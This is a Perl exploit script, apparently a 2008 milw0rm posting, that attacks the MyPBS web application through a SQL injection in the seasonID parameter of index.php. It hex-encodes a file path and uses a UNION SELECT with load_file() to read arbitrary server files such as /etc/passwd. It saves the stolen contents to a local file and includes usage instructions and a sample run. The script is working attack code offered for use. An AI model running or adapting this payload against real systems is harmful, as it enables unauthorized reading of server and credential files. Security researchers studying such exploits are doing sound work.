MyPBS (index.php seasonID) Remote SQL Injection Exploit#!/usr/bin/perl
################################
##    Coded by Piker [piker(dot)ther00t(at)gmail(dot)com]
##      D.O.M Team
## piker,ka0x,an0de,xarnuz
## 2008 Security Researchers
################################
##
## MyPBS Remote SQL Injection Exploit
##
##   This exploit tries to read an
##   arbitrary file.
##
################################

# piker@domlabs:~/advisories$ perl mypbs.pl http://localhost/mypbs /etc/passwd
#[+] File HEX: 0x2f6574632f706173737764
#[+] Host: http://localhost/mypbs/
#[+] File content:
#daemon:x:1:1:daemon:/usr/sbin:/bin/sh
#bin:x:2:2:bin:/bin:/bin/sh
#sys:x:3:3:sys:/dev:/bin/sh
#sync:x:4:65534:sync:/bin:/bin/sync
#games:x:5:60:games:/usr/games:/bin/sh
# [...]
#[+] EOF
#
#


use LWP::UserAgent;

open(FILE, `>&amp;STDOUT`);

my $host = $ARGV[0];
my $file = $ARGV[1];

die &amp;_USO unless $ARGV[1];

sub _USO
{
    die `
    MyPBS Remote SQL Injection Exploit

    This exploit tries to read an
    arbitrary file.
  
    usage: ./$0 <host> <file_you_want>
    ex: ./$0 http://localhost/mypbs/ /etc/passwd

    `;
}

my $ua = LWP::UserAgent->new() or die;
$ua->agent(`Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1`);

my $tmp=`0x`;
my $tmp2;

foreach my $c (split(//, $file)){
    $tmp2 = sprintf (`%x`, ord($c));
    $tmp .= $tmp2;
}

print FILE `[+] File HEX: `.$tmp.`\n`;

if ($host !~ /\/$/){ $host .= `/`; }

print FILE `[+] Host: `.$host.`\n`;

my $req = HTTP::Request->new(GET => $host.`index.php?seasonID=-1 union all select CONCAT(0x3c46494c453e,load_file(`.$tmp.`),0x3c46494c453e)`);
my $res = $ua->request($req);
my $con = $res->content;

my $ok = 0;
open (OUT, `>result.txt`);

if ($res->is_success){
    foreach my $linea (split(/\n/, $con)){
        if($ok == 1){
            if ($linea !~ /<FILE>/){
                print FILE $linea.`\n`;
        print OUT $linea.`\n`;
            }else{
                print FILE `\n[+] EOF\n`;
        print `\n[+] File saved into 'result.txt'\n`;
                goto salida;
            }
        }
        if($linea =~ /<FILE>/i &amp;&amp; $ok == 0){
            $ok = 1;
            print FILE `[+] File content: \n`;
        }
    }
    salida:
    if ($ok == 0){
        print FILE `[-] Exploit Failed!`;
    }      
}
else{
    print FILE `[-] Exploit Failed!`;
}

close(FILE);
close(OUT);

#EOF

# milw0rm.com [2008-12-19]